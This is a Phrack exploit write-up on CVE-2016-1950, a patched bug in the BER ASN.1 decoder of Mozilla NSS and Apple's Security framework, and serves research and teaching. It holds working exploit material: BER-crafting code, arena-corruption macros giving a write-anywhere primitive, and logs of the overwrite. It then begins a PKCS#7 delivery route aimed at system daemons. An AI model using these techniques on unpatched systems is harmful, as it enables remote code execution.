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Phrack Inc. Volume 16 Issue 70 File 12

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Published in 
Phrack Inc
 · 1 month ago

                            ==Phrack Inc.== 

Volume 0x10, Issue 0x46, Phile #0x0c of 0x0f

|=----------------------=[ The Bear in the Arena ]=----------------------=|
|=------------------------------=[ xerub ]=------------------------------=|

-- Table of contents

0 - Introduction
1 - ASN.1 basics
1.0 - BER basics
2 - Enter the bug
2.0 - The allocator
2.1 - The state machine
2.2 - The subtle flaw
2.3 - The strategy
3 - Exploit techniques
3.0 - PKCS#7
3.1 - Building blocks
4 - Fast forward
4.0 - Rolling the dice
4.1 - Dance, little bunny!
4.2 - He who controls the Arena
4.2.0 - Copyout
4.2.1 - Copyin
4.2.2 - Arithmetic
4.3 - Assembling the pieces
5 - Conclusions
6 - References
7 - Source code

-- 0 - Introduction

In this article we set out to analyse an old bug, namely CVE-2016-1950[0].
While the bug was fixed long ago, it is worth dissecting it because of its
particularities and potential effects it had before it was patched. The bug
was present in the Mozilla NSS (the BER ASN.1 parser to be more specific) a
codebase that is also used by iOS/macOS, thereby impacting all applications
using the Security framework. We'll walk through some exploit techniques
powerful enough to gain code execution in certain daemons.

-- 1 - ASN.1 basics

Abstract Syntax Notation One (ASN.1) is an interface description language
used for defining data structures that can be serialised and deserialised
in a cross-platform way[1]. It is used in telecommunications and computer
networking, cryptography, and other fields.

Let's start with a simple example of ASN.1:

FooQuestion ::= SEQUENCE {
trackingNumber INTEGER,
question IA5String
FooAnswer ::= SEQUENCE {
questionNumber INTEGER,
answer BOOLEAN

And the messages:

myQuestion FooQuestion ::= {
trackingNumber 5,
question "Anybody there?"

myAnswer FooAnswer ::= {
questionNumber 5,
answer true

In order to pass around the actual messages, they have to be encoded by the
sender and decoded by the receiver. There exist various types of encodings:
DER, BER, XER, CER, PER and so on, but in this article we will focus on BER
(Basic Encoding Rules) for reasons that will become apparent later.

-- 1.0 - BER basics

BER is a TLV encoding, aka type-length-value. Each data element is encoded
as a Type, followed by a Length, followed by the actual Data and optionally
an end-of-content marker.

| Type | Length | Data | END (optional) |

ITU-T X.680 defines the Type:

End-of-Content (EOC) Primitive 0
BOOLEAN Primitive 1
INTEGER Primitive 2
BIT STRING Primitive/Constructed 3
SEQUENCE and SEQUENCE OF Constructed 16

The Type is encoded as an ASN tag. In its simplest form it looks like this:

| Class (2 bits) | Primitive/Constructed (1 bit) | Type (5 bits) |

When the type exceeds 5 bits, the tag is encoded a bit differently, but we
don't need it for the purpose of this writeup.

For our FooAnswer example, the simplest encoding would be (in hex):

30 is a combination of 0x20 (Constructed) + 0x10 (Sequence)
06 is the total sequence length
02 denotes an integer
01 denotes the length of the integer in bytes
05 the actual integer value
01 denotes a boolean
01 denotes the length of the boolean in bytes
FF the actual boolean value (TRUE)

It is important to note that BER encoding is quite flexible. For example,
we can have a bitstring expressed as a sequence of one or more primitive

23 is a combination of 0x20 (Constructed) + 0x03 (Bit String)
09 is the total length of the components
03 denotes a bitstring
02 the length of the bitstring in bytes, plus 1
00 number of unused trailing bits at the end of the last byte
41 the first part of the actual bitstring
03 denotes a bitstring
02 the length of the bitstring in bytes, plus 1
01 number of unused trailing bits at the end of the last byte
42 42 the second part of the actual bitstring

The decoder should merge those bitstrings, resulting in: 010000010100001.

Length can be specified in two ways: indefinite and definite. The former
does not encode the length at all, but the content data must finish at EOC.
The latter has two forms: short and long. The short form is a single byte
in range [0 .. 127]. The long form is expressed as (0x80 + size of length),
followed by the actual length in big-endian format. This is not terribly
important but such encodings may pop up later in our article.

There are many other examples of BER flexibility, but we will not concern
ourselves with those, because they are outside the scope of this article.

DER is very similar to BER, but with all that flexibility removed. Whereas
BER has many ways to skin the cat, DER will provide only one, the canonical
form. Because ASN.1 parsers tend to become very complex to handle all sorts
of obscure BER input, they can become a rich source of bugs.

-- 2 - Enter the bug

For a very long time, security researchers have looked for software bugs
using differential analysis, especially when the vendor is vague about the
fixed vulnerabilities. Oftentimes, after a security update, it is worth
diffing or -- when the source is not available -- bindiffing between the
new version and the old one.

Let's take a look at the security content of iOS 9.3 update[0], matching
with OS X El Capitan v10.11.4 / Security Update 2016-002. Somewhere down
the line, it says:

Impact: Processing a maliciously crafted certificate may lead to
arbitrary code execution
Description: A memory corruption issue existed in the ASN.1 decoder.
This issue was addressed through improved input validation.
CVE-2016-1950 : Francis Gabriel of Quarkslab

OK, this sounds pretty bad. Or good, depending on the perspective. In this
case the sources were available[2], so it was worth enough diffing them:

$ diff -Naurp Security-57337.20.44 Security-57337.40.85

Most of the relevant code is in Security-57337.20.44/OSX/libsecurity_asn1/
and something interesting pops up in secasn1d.c.diff:

// If this is a bit string, the length is bits, not bytes.

Indeed, the old code looks somewhat fishy:

PORT_Memcpy(item->Data + item->Length, buf, len);
item->Length += len;
... and somewhere down the line...
item->Length = (item->Length << 3) - state->bit_string_unused_bits;

A quick glance tells us the bit vs byte confusion happens at concatenating
multiple primitive bitstrings and smells like OOB write. The offset seems
to jump geometrically higher and higher in `sec_asn1d_parse_leaf` and it is
reachable from:


-- 2.0 - The allocator

The decoder has its own memory allocator, an Arena Allocator[3], designed
to be simple and fast. Introduced by Douglas T. Ross around 1967, it was
later demonstrated by Hanson in 1990 that Arenas are the fastest memory
management solution.

In its simplest form, an Arena Allocator cuts consecutive slices from a big
block of memory, which was previously requested from the Operating System.
These blocks are considered "large" by the system allocator, and therefore
happen to be aligned to at least 256 bytes. When the current Arena block is
exhausted a new block is requested from the OS and the process is repeated.
Usually the memory is freed all-at-once, if at all.

The ASN.1 decoder allocates memory via `sec_asn1d_[z]alloc` which calls
`PORT_ArenaAlloc` in secport.c, which in turn calls `PL_ARENA_ALLOCATE` in

The freeing is done by `PORT_FreeArena` which calls `PL_CLEAR_ARENA` macro
for each linked Arena. It was supposed to nuke the memory contents, but in
Release mode it does nothing, which allows us to get away without crashing
after we start manipulating the Arena meta-data. OK, that was a spoiler...

The memory manager consists of two pools, each pool containing a linked
list of Arenas. `our_pool` holds arenas for state objects and temporary
storage, and `their_pool` keeps the destination structures. Each Arena is
being defined by the following structure:

struct PLArena {
PLArena *next; /* next arena for this lifetime */
PRUword base; /* aligned base address, follows this header */
PRUword limit; /* one beyond last byte in arena */
PRUword avail; /* points to next available byte */

Which is laid out in memory:

| v
| next | base | limit | avail | ... USED|FREE ... |
| | ^ ^
| +-------------+ |

After one `PORT_ArenaAlloc`, avail moves toward the limit:

| next | base | limit | avail | ... USED ...|FREE |
| | ^ ^
| +-----------------+ |

When an Arena is exhausted, a new one is linked in and the process repeats.
At any given time, we are guaranteed that the next allocation will happen
between `avail` and `limit`.

-- 2.1 - The state machine

As it turns out, we can build libasn1.dylib from the published sources: we
change to Security-57337.20.44/OSX/libsecurity_asn1/ and, after a bit of
plumbing, we can finally type "make". This allows us to instrument/debug
the library and visualise the allocations, the state transitions, etc. Our
business is in Security-57337.20.44/OSX/libsecurity_asn1/secasn1d.c, please
keep an eye on it, there will be a lot of code snippets as we move forward.

Let's investigate how the ASN.1 parsing really works. The decoder is driven
by the so-called templates, which define a decoding schema for the expected
input. For example, when decoding a signed X.509 certificate, it will use
`kSecAsn1SignedCertTemplate`. A template may contain various subtemplates:
`kSecAsn1TBSCertificateTemplate`, `kSecAsn1AlgorithmIDTemplate` and so on.
This mechanism makes sure the elements come in the required order and the
parsing stops if the consumed element does not match the expected type:

Template (expected) Input data (actual)
Element type <==+==> Element
Element type <==+==> Element
Element type <==+==> Element
Element type <==!==> Wrong element

The state of the currently parsed element is kept in `sec_asn1d_state`, a
structure containing various flags, sub-items and a pointer to the current
template -- this will become important a bit later. The state object looks
like this:

typedef struct sec_asn1d_state_struct {
SEC_ASN1DecoderContext *top;
const SecAsn1Template *theTemplate;
void *dest; // SecAsn1Item *item
struct sec_asn1d_state_struct *parent;
unsigned int bit_string_unused_bits;
struct subitem *subitems_head;
struct subitem *subitems_tail;
} sec_asn1d_state;

Small note: during this writeup, `item` will always refer to `state->dest`
and may be used interchangeably hereinafter.

The ASN.1 parser consumes the input, allocating memory as it goes. For each
element, a state object and the actual data are laid down in memory inside
whatever Arena is active at that given point.

| next | base | limit | avail | STATE, DATA, STATE, DATA ...|FREE |
| | ^ ^
| +---------------------------------+ |

Now we can build a simple example, a constructed bitstring composed of two
primitive bitstrings:

len = 256;

REP_BITSTRING(0, 10, 'a');

if (len) {
START_BITSTRING(0, len - 1);
while (len) {

The above pseudo-code will generate:

23 constructed bitstring
82 01 00 length (2 byte long form): 0x100 bytes
03 primitive bitstring
0B length: 11 bytes, including the unused bits specifier
00 number of unused bits, trailing at the end of the last byte
03 primitive bitstring
81 F0 length (1 byte long form): 240 bytes
00 number of unused bits, trailing at the end of the last byte

Which can be decoded with the following call to libasn1.dylib:

SecAsn1Decode(input, input_size, kSecAsn1BitStringTemplate, &output);

We get this:

new ARENA -> o_pool/0x7fab29003020 of size 2087
sec_asn1d_push_state:429: zalloc(144) -> 0x7fab29003070 in arena o_pool/0x7fab29003020 (left 1831)
new ARENA -> t_pool/0x7fab29000020 of size 1063
sec_asn1d_prepare_for_contents:1458: zalloc(256) -> 0x7fab29000020 in arena t_pool/0x7fab29000020 (left 775)
sec_asn1d_push_state:429: zalloc(144) -> 0x7fab29003100 in arena o_pool/0x7fab29003020 (left 1687)
STATE transition 0x7fab29003070 -> 0x7fab29003100
sec_asn1d_parse_leaf: memcpy(0x7fab29000020 + 0 = 0x7fab29000020, "6161616161616161", 10) <-- [A]
adjusting item->len (10) to 80, unused=0x0 <-- [B]
STATE transition 0x7fab29003100 -> 0x7fab29003070
STATE transition 0x7fab29003070 -> 0x7fab29003100
sec_asn1d_parse_leaf: memcpy(0x7fab29000020 + 80 = 0x7fab29000070, "7a7a7a7a7a7a7a7a", 239) <-- [C]
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (319) to 2552, unused=0x0
STATE transition 0x7fab29003100 -> 0x7fab29003070
STATE transition 0x7fab29003070 -> 0x0

`zalloc(144)` is allocating a new state object. `zalloc(256)` is allocating
space for the bitstring itself. And we observe the two memcpy:

memcpy(0x7fab29000020 + 0 = 0x7fab29000020, "6161616161616161", 10) // the 1st memcpy: [A]
memcpy(0x7fab29000020 + 80 = 0x7fab29000070, "7a7a7a7a7a7a7a7a", 239) // the 2nd memcpy: [C]

That is, the state machine is concatenating the two primitive bitstrings to
create the final constructed bitstring. But the bitstring pieces should be
adjacent, yet they are not, because:

PORT_Memcpy(item->Data + item->Length, buf, len);
item->Length += len;
item->Length = (item->Length << 3) - state->bit_string_unused_bits;

At each concatenation, `item->Length` is used as an offset and then it is
updated, growing exponentially higher by roughly a factor of 8, as seen
above at [B].

The good news is that the overflow works. The bad news is that the memcpy
happens in `their_pool` Arena, whereas the state objects are allocated in
`our_pool` Arena. This is not great, since it may be difficult to massage
`their_pool` Arenas and -- even if we pull it off -- there may be nothing
interesting there. We want `our_pool` Arenas, because that's where the
state objects are.

-- 2.2 - The subtle flaw

By carefully analysing the state machine for whatever ways of switching to
`our_pool`, we notice a weird thing in `sec_asn1d_parse_bit_string`:

if ((state->pending == 0) || (state->contents_length == 1)) {
if (state->dest != NULL) {
SecAsn1Item *item = (SecAsn1Item *)(state->dest);
item->Data = NULL; // <-- [D]
item->Length = 0;
state->place = beforeEndOfContents;
if (state->contents_length == 1) {
/* skip over (unused) remainder byte */
return 1;
} else {
return 0;

It looks like a shortcut for empty primitive strings. It essentially nukes
the destination item and switches to `beforeEndOfContents`. It looks almost
legit, except it is throwing away the old `item->Data` by setting it to
NULL, as seen at [D]. Then, when the next bitstring component arrives,
`sec_asn1d_prepare_for_contents` sees that `item` is nuked and allocates it
anew, but this time in `our_pool`. The allocation size is fit to accomodate
the last length that was parsed.

And here things start to become interesting. A constructed bitstring has a
total length and then each component has its own length (all of these must
sum up to the total). If we enter `sec_asn1d_prepare_for_contents` right
after the shortcut, the parser must have already parsed the next component
and the last parsed length will be of that component, which is smaller than
the total. What we just achieved was to throw away the good `item->Data`
(sized for the grand total) and replace it with a new `item->Data` (sized
for the next component after the shortcut). If the shortcut didn't exist,
then `sec_asn1d_prepare_for_contents` would have not allocated `item->Data`
again, and the size of the allocation would have remained fit for the grand
total. This is a bug in its own right, but more on that later...

The switch to `our_pool` was our goal, and we got it:

alloc_len = state->contents_length;
if (item == NULL || state->top->filter_only) {
} else if (state->substring) {
* If we are a substring of a constructed string, then we may
* not have to allocate anything (because our parent, the
* actual constructed string, did it for us). If we are a
* substring and we *do* have to allocate, that means our
* parent is an indefinite-length, so we allocate from our pool;
* later our parent will copy our string into the aggregated
* whole and free our pool allocation.

if (item->Data == NULL) {
PORT_Assert (item->Length == 0);
poolp = state->top->our_pool;
} else {
alloc_len = 0;
} else {

if (alloc_len || ...) {
if (item) {
item->Data = (unsigned char*)sec_asn1d_zalloc (poolp, alloc_len);

Let's try again, forcing the switch to `our_pool` by introducing an empty
bitstring aka the shortcut aka the breaker aka the key to the kingdom:

CONS_BITSTRING(len); // item->Data is a block of size=len in their_pool
START_BITSTRING(0, 0); // nuke item->Data
REP_BITSTRING(0, 10, 'a'); // new item->Data is a block of size=10+1 in our_pool

if (len) {
START_BITSTRING(0, len - 1);
while (len) {

new ARENA -> o_pool/0x7f84fc803020 of size 2087
sec_asn1d_push_state:429: zalloc(144) -> 0x7f84fc803070 in arena o_pool/0x7f84fc803020 (left 1831)
new ARENA -> t_pool/0x7f84fc800020 of size 1063
sec_asn1d_prepare_for_contents:1458: zalloc(256) -> 0x7f84fc800020 in arena t_pool/0x7f84fc800020 (left 775)
sec_asn1d_push_state:429: zalloc(144) -> 0x7f84fc803100 in arena o_pool/0x7f84fc803020 (left 1687)
STATE transition 0x7f84fc803070 -> 0x7f84fc803100
STATE transition 0x7f84fc803100 -> 0x7f84fc803070
STATE transition 0x7f84fc803070 -> 0x7f84fc803100
sec_asn1d_prepare_for_contents:1458: zalloc(11) -> 0x7f84fc803190 in arena o_pool/0x7f84fc803020 (left 1671)
sec_asn1d_parse_leaf: memcpy(0x7f84fc803190 + 0 = 0x7f84fc803190, "6161616161616161", 10)
adjusting item->len (10) to 80, unused=0x0
STATE transition 0x7f84fc803100 -> 0x7f84fc803070
STATE transition 0x7f84fc803070 -> 0x7f84fc803100
sec_asn1d_parse_leaf: memcpy(0x7f84fc803190 + 80 = 0x7f84fc8031e0, "7a7a7a7a7a7a7a7a", 236)
adjusting item->len (316) to 2528, unused=0x0
STATE transition 0x7f84fc803100 -> 0x7f84fc803070
STATE transition 0x7f84fc803070 -> 0x0

`sec_asn1d_zalloc(11)` is allocating a temporary buffer of size 10+1.

The parser creates a temporary buffer, which resides in `our_pool`, and it
is using it to agglutinate the complete bitstring. But this buffer is only
sized for the first part -- the 'a' part of size 10+1 -- and therefore it
is much smaller than it should be. Remember that `our_pool` is a list of
Arenas holding either state objects or temporary input data:

"aaaaaaaaaa" "zzz..."
| next | base | limit | avail | STATE, STATE, TEMPORARY |FREE... |
| | ^ ^
| +-----------------------------+ |

Let's try again, but force another state object allocation after our short
buffer which gets overflowed. We insert a nested constructed bitstring and
see what happens. Yes, BER allows it. Yes, it is really that bad...

REP_BITSTRING(0, 10, 'a');

if (len) {
START_BITSTRING(0, len - 1);
while (len) {

new ARENA -> o_pool/0x7f91f3803020 of size 2087
sec_asn1d_push_state:429: zalloc(144) -> 0x7f91f3803070 in arena o_pool/0x7f91f3803020 (left 1831)
new ARENA -> t_pool/0x7f91f3800020 of size 1063
sec_asn1d_prepare_for_contents:1458: zalloc(256) -> 0x7f91f3800020 in arena t_pool/0x7f91f3800020 (left 775)
sec_asn1d_push_state:429: zalloc(144) -> 0x7f91f3803100 in arena o_pool/0x7f91f3803020 (left 1687)
STATE transition 0x7f91f3803070 -> 0x7f91f3803100
STATE transition 0x7f91f3803100 -> 0x7f91f3803070
STATE transition 0x7f91f3803070 -> 0x7f91f3803100
sec_asn1d_prepare_for_contents:1458: zalloc(13) -> 0x7f91f3803190 in arena o_pool/0x7f91f3803020 (left 1671)
sec_asn1d_push_state:429: zalloc(144) -> 0x7f91f38031a0 in arena o_pool/0x7f91f3803020 (left 1527)
STATE transition 0x7f91f3803100 -> 0x7f91f38031a0
sec_asn1d_parse_leaf: memcpy(0x7f91f3803190 + 0 = 0x7f91f3803190, "6161616161616161", 10)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (10) to 80, unused=0x0
STATE transition 0x7f91f38031a0 -> 0x7f91f3803100
STATE transition 0x7f91f3803100 -> 0x7f91f3803070
STATE transition 0x7f91f3803070 -> 0x7f91f3803100
sec_asn1d_parse_leaf: memcpy(0x7f91f3803190 + 80 = 0x7f91f38031e0, "7a7a7a7a7a7a7a7a", 234)
sec_asn1d_parse_leaf: pre-existing value = 0x3
adjusting item->len (314) to 2512, unused=0x0
STATE transition 0x7f91f3803100 -> 0x7f91f3803070
STATE transition 0x7f91f3803070 -> 0x0

It is pretty obvious that we can overwrite the state object of the nested
constructed bitstring.

"aaaaaaaaaa" "zzz..."
| next | base | limit | avail | STATE, STATE, TEMPORARY, STATE|FREE...|
| | ^ ^
| +-----------------------------------+ |

However, by the time the second string gets copied, the nested state object
is abandoned, and nothing happens. We deduce the actual smash must happen
inside the nested constructed bitstring:

CONS_BITSTRING(3 + 10 + 3 + 64);
REP_BITSTRING(0, 10, 'a');
REP_BITSTRING(0, 64, 'b'); // smashes the active state object

if (len) {
START_BITSTRING(0, len - 1);
while (len) {

new ARENA -> o_pool/0x7fa27d003020 of size 2087
sec_asn1d_push_state:429: zalloc(144) -> 0x7fa27d003070 in arena o_pool/0x7fa27d003020 (left 1831)
new ARENA -> t_pool/0x7fa27d000020 of size 1063
sec_asn1d_prepare_for_contents:1458: zalloc(256) -> 0x7fa27d000020 in arena t_pool/0x7fa27d000020 (left 775)
sec_asn1d_push_state:429: zalloc(144) -> 0x7fa27d003100 in arena o_pool/0x7fa27d003020 (left 1687)
STATE transition 0x7fa27d003070 -> 0x7fa27d003100
STATE transition 0x7fa27d003100 -> 0x7fa27d003070
STATE transition 0x7fa27d003070 -> 0x7fa27d003100
sec_asn1d_prepare_for_contents:1458: zalloc(80) -> 0x7fa27d003190 in arena o_pool/0x7fa27d003020 (left 1607)
sec_asn1d_push_state:429: zalloc(144) -> 0x7fa27d0031e0 in arena o_pool/0x7fa27d003020 (left 1463)
STATE transition 0x7fa27d003100 -> 0x7fa27d0031e0
sec_asn1d_parse_leaf: memcpy(0x7fa27d003190 + 0 = 0x7fa27d003190, "6161616161616161", 10)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (10) to 80, unused=0x0
STATE transition 0x7fa27d0031e0 -> 0x7fa27d003100
STATE transition 0x7fa27d003100 -> 0x7fa27d0031e0
sec_asn1d_parse_leaf: memcpy(0x7fa27d003190 + 80 = 0x7fa27d0031e0, "6262626262626262", 64)
sec_asn1d_parse_leaf: pre-existing value = 0x7fa27d003020

Great! We can now smash an active state object while it is being accessed.

-- 2.3 - The strategy

Looking at the `sec_asn1d_state` structure, we realise there are many flags
that we can smash, which may or may not confuse the ASN.1 parser state
machine. And there are many pointers which we can do partial overwrites on,
which has the effect of moving them to another controlled area inside the
current Arena. However tempting is to try all of these, we realise there is
a low-hanging fruit in there. Recall how the overwrite offset is computed:

item->Length += len;
item->Length = (item->Length << 3) - state->bit_string_unused_bits;

By making the `bit_string_unused_bits` large, we can have `item->Length`
going negative. This has the effect of having `item->Data + item->Length`
pointing somewhere to a smaller address, which can be used to smash other
state objects, allocated previously. But then, we end up with the same
problem, and then we'd have to figure out what state field to smash again.

A better target is to smash the Arena structure itself. This is a meta-data
attack. It works because the allocations inside an Arena are predictable by
design. In fact, we know our bitstrings will always be laid out at the same
distance from the start of the active Arena, for a given input.

"aaaaaaaaaa" v
| next | base | limit | avail | ... TEMPORARY, STATE|FREE ... |
^ |
+---------------------------- dest -+

After we do this, we trigger another allocation, with another bitstring. If
we get it right we can manipulate Arena `limit/avail`, effectively gaining
an allocate-anywhere primitive. And if we follow up with another bitstring,
we have gained a write-anywhere primitive.

CONS_BITSTRING(3 + 19 + 3 + 4);
REP_BITSTRING(4, 19, 'a'); // filler
START_BITSTRING(0, 4); // smash bit_string_unused_bits
PUSH4((19 * 8 - 4 + 4) * 8 + (0x3190 - 0x3020) + 2*8);

START_BITSTRING(0, 16); // smash the Arena
PUSH8(0x4141414141414140 + 16); // limit
PUSH8(0x4141414141414140); // avail

START_BITSTRING(0, 0); // trigger new allocation
REP_BITSTRING(0, 1, 'b'); // trigger new memcpy over allocation

if (len) {
START_BITSTRING(0, len - 1);
while (len) {

If the above seems somewhat confusing, refer to "openssl asn1parse" output:

0:d=0 hl=4 l= 256 cons: BIT STRING
4:d=1 hl=2 l= 1 prim: BIT STRING // break, trigger allocation
7:d=1 hl=2 l= 29 cons: BIT STRING
9:d=2 hl=2 l= 20 prim: BIT STRING // filler: "aaa..."
31:d=2 hl=2 l= 5 prim: BIT STRING // bit_string_unused_bits
38:d=1 hl=2 l= 17 prim: BIT STRING // destination: Arena limit/avail
57:d=1 hl=2 l= 1 prim: BIT STRING // break, trigger fake alloc
60:d=1 hl=2 l= 2 prim: BIT STRING // write value: "b"
64:d=1 hl=3 l= 193 prim: BIT STRING // remainder "zzz..."

new ARENA -> o_pool/0x7ffe62803020 of size 2087
sec_asn1d_push_state:429: zalloc(144) -> 0x7ffe62803070 in arena o_pool/0x7ffe62803020 (left 1831)
new ARENA -> t_pool/0x7ffe62800020 of size 1063
sec_asn1d_prepare_for_contents:1458: zalloc(256) -> 0x7ffe62800020 in arena t_pool/0x7ffe62800020 (left 775)
sec_asn1d_push_state:429: zalloc(144) -> 0x7ffe62803100 in arena o_pool/0x7ffe62803020 (left 1687)
STATE transition 0x7ffe62803070 -> 0x7ffe62803100
STATE transition 0x7ffe62803100 -> 0x7ffe62803070
STATE transition 0x7ffe62803070 -> 0x7ffe62803100
sec_asn1d_prepare_for_contents:1458: zalloc(29) -> 0x7ffe62803190 in arena o_pool/0x7ffe62803020 (left 1655)
sec_asn1d_push_state:429: zalloc(144) -> 0x7ffe628031b0 in arena o_pool/0x7ffe62803020 (left 1511)
STATE transition 0x7ffe62803100 -> 0x7ffe628031b0
sec_asn1d_parse_leaf: memcpy(0x7ffe62803190 + 0 = 0x7ffe62803190, "6161616161616161", 19)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (19) to 148, unused=0x4
STATE transition 0x7ffe628031b0 -> 0x7ffe62803100
STATE transition 0x7ffe62803100 -> 0x7ffe628031b0
sec_asn1d_parse_leaf: memcpy(0x7ffe62803190 + 148 = 0x7ffe62803224, "640", 4)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (152) to 18446744073709551232, unused=0x640
STATE transition 0x7ffe628031b0 -> 0x7ffe62803100
STATE transition 0x7ffe62803100 -> 0x7ffe62803070
STATE transition 0x7ffe62803070 -> 0x7ffe62803100
sec_asn1d_parse_leaf: memcpy(0x7ffe62803190 + 18446744073709551232 = 0x7ffe62803010, "4141414141414150", 16)
sec_asn1d_parse_leaf: pre-existing value = 0x7ffe62803827
adjusting item->len (18446744073709551248) to 18446744073709548672, unused=0x0
STATE transition 0x7ffe62803100 -> 0x7ffe62803070
STATE transition 0x7ffe62803070 -> 0x7ffe62803100
STATE transition 0x7ffe62803100 -> 0x7ffe62803070
STATE transition 0x7ffe62803070 -> 0x7ffe62803100
sec_asn1d_prepare_for_contents:1458: zalloc(2) -> 0x4141414141414140 in arena o_pool/0x0 (left -1)
sec_asn1d_parse_leaf: memcpy(0x4141414141414140 + 0 = 0x4141414141414140, "62", 1)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (1) to 8, unused=0x0
STATE transition 0x7ffe62803100 -> 0x7ffe62803070
STATE transition 0x7ffe62803070 -> 0x7ffe62803100
sec_asn1d_parse_leaf: memcpy(0x4141414141414140 + 8 = 0x4141414141414148, "7a7a7a7a7a7a7a7a", 192)
sec_asn1d_parse_leaf: pre-existing value = 0x0
adjusting item->len (200) to 1600, unused=0x0
STATE transition 0x7ffe62803100 -> 0x7ffe62803070
STATE transition 0x7ffe62803070 -> 0x0

We got our write-anywhere:

memcpy(0x4141414141414140 + 0, "62", 1)

but apparently the remainder of the string is also written somewhere around
that address. We will address this issue momentarily (pun intended).

First, let's explain our contraption above. There are two magic values in
our bitstring: the value with which to overwrite `bit_string_unused_bits`,
and the length of the filler. The former is given by the offset of the
temporary buffer inside our current Arena. It does vary depending on what
elements have been processed before our bitstring, but for a given input
it is considered constant:

D = 0x7fb191003190 - 0x7fb191003020 // actual values do not matter

The latter can be calculated with the following formula:

K = (116=offsetof(sec_asn1d_state, bit_string_unused_bits) +
round8(K + 10) + 4=bit_string_unused_bits) / 8

We find that K=19 satisfies the equation and it is a constant allowing us
to reach `state->bit_string_unused_bits`. Now we can sum up all the above
into a write-anywhere primitive:

#define MAKE_ARENA64(filler, arena_used, lower_bound, upper_bound) \
do { \
CONS_BITSTRING(10 + 19); \
REP_BITSTRING(4, 19, filler); \
PUSH4((19 * 8 - 4 + 4) * 8 + (arena_used) + 2*8); \
PUSH8(upper_bound); \
PUSH8(lower_bound); \
} while (0)

#define WRITE64(clean, x) \
do { \
if (clean) { \
PUSH1(x); \
PUSH7((x) >> 8); \
} else { \
PUSH8(x); \
} \
} while (0)

And finally, our code looks like this:

START_BITSTRING(0, 0); // break

MAKE_ARENA64('a', 0x3190 - 0x3020, 0x4141414141414140, 0x4141414141414150);

WRITE64(0, 0x4242424242424242); // break & write

if (len) {
START_BITSTRING(0, 0); // break for clean exit
START_BITSTRING(0, len - 1);
while (len) {

It essentially translates to:

memset(0x4141414141414140, 0, sizeof(0x4242424242424242) + 1);
*(uint64_t *)0x4141414141414140 = 0x4242424242424242;

You will notice there are 3 breakers. One just before hijacking the current
Arena. Another one inside the arbitrary write, and the last one just before
the remainder of the string. The last one makes sure further ASN.1 parsing
resumes in a normal way, without even crashing. This is possible because we
designed our fake Arena as small as possible, just enough to accommodate
one write; any further allocs will link in new legit Arenas.

To sum it up, we smash a state object to manipulate the current Arena. This
will coerce `sec_asn1d_zalloc` into returning the address we want, and make
this fake Arena look exhausted after one write. Then we just copy our value
at the aforementioned address. There is one minor inconvenience though: the
destination address is subject to a zeroing step, which goes one byte past
our write size. In order to fix the bleeding, we have to do a multi-stage
write (WRITE64 has a parameter to correct this automatically if needed):

// write n bytes
START_BITSTRING(0, 0); // break
START_BITSTRING(7, 1); // sec_asn1d_zalloc, then memset(dest, 0, 1 + 1)
PUSH1(first); // write first byte. item->Length = (0 + 1) * 8 - 7
PUSHB(next); // next bytes get written at offset +1

And finally, we can do as many writes as we want, by repeating the process:


MAKE_ARENA64('a', 0x3190 - 0x3020, 0x4141414141414140, 0x4141414141414140 + 16);

WRITE64(0, 0x4242424242424242);


MAKE_ARENA64('a', 0, 0x4343434343434340, 0x4343434343434340 + 16);

WRITE64(0, 0x4444444444444444);

if (len) {
START_BITSTRING(0, len - 1);
while (len) {

Which translate into:

*(uint64_t *)0x4141414141414140 = 0x4242424242424242;
*(uint64_t *)0x4343434343434340 = 0x4444444444444444;

Notice the subsequent writes, and their respective Arenas, start afresh. It
means D must be always zero after the first one.

The reasoning is almost identical for 32bit, we just need to find D and K.
D can be found experimentally:

D = 0x7a1f18e8 - 0x7a1f1810 // actual values do not matter

And then K is found with the following formula:

K = (64=offsetof(sec_asn1d_state, bit_string_unused_bits) +
round8(K + 10) + 0=bit_string_unused_bits) / 8

Once we found D and K=11, we can write a similar Arena primitive:

#define MAKE_ARENA32(filler, arena_used, lower_bound, upper_bound) \
do { \
CONS_BITSTRING(10 + 11); \
REP_BITSTRING(0, 11, filler); \
PUSH4((11 * 8 - 0 + 4) * 8 + (arena_used) + 2*4); \
PUSH4(upper_bound); \
PUSH4(lower_bound); \
} while (0)

#define WRITE32(clean, x) \
do { \
if (clean) { \
PUSH1(x); \
PUSH3((x) >> 8); \
} else { \
PUSH4(x); \
} \
} while (0)

allowing us to kickstart the write-anywhere:

MAKE_ARENA32('a', 0x8e8 - 0x810, 0x41414140, 0x41414140 + 16);

What we got is an extremely reliable primitive which can write constant
values at constant addresses. Let's see if we can put them to good use.

-- 3 - Exploit techniques

We need to target some application or daemon that listens and accepts ASN.1
encoded data. So far, we have experimented on bare bitstrings, but that is
extremely unlikely any real world application would ask for. We need some
standard containers, such as an X.509 certificate or a PKCS#7 structure,
ready to be consumed. A certificate's signature is indeed a bitstring that
we can manipulate, but that renders the certificate invalid. Our exploit
would need to fully achieve its goal before the certificate is validated.

For now, let's suppose our victim is a daemon that consumes PKCS#7 and
extracts the certificate for later validation. It accomplishes this with a
call to `SecCMSCertificatesOnlyMessageCopyCertificates`. That function can
be found inside the Security framework, and it uses `SecCmsMessageDecode`
to parse the incoming PKCS#7, which in turn uses `SEC_ASN1DecoderUpdate`.

-- 3.0 - PKCS#7

PKCS#7 stands for Cryptographic Message Syntax (aka CMS). It is a standard
for storing signed and/or encrypted data, described by RFC 3369[4].

Looking at Security-57337.20.44/OSX/libsecurity_smime/lib/cmsasn1.c, we see
that we can find only one occurence of `kSecAsn1BitStringTemplate`. Recall
the parser is driven by templates, so we know the ASN.1 parser will expect
a bitstring wherever it hits that template. Tracing back, we get:


It looks like we need to craft an enveloped PKCS#7. However, our target
expects a signed PKCS#7, which looks roughly like this:

prim: OBJECT :pkcs7-signedData
cons: cont [ 0 ]
prim: INTEGER :01
cons: SET
prim: OBJECT :pkcs7-data
cons: cont [ 0 ]
cons: SET

But wait. We can stash an enveloped PKCS#7 instead of raw pkcs7-data.

prim: OBJECT :pkcs7-signedData
cons: cont [ 0 ]
prim: INTEGER :01
cons: SET
prim: OBJECT :sha1
prim: NULL
prim: OBJECT :pkcs7-envelopedData
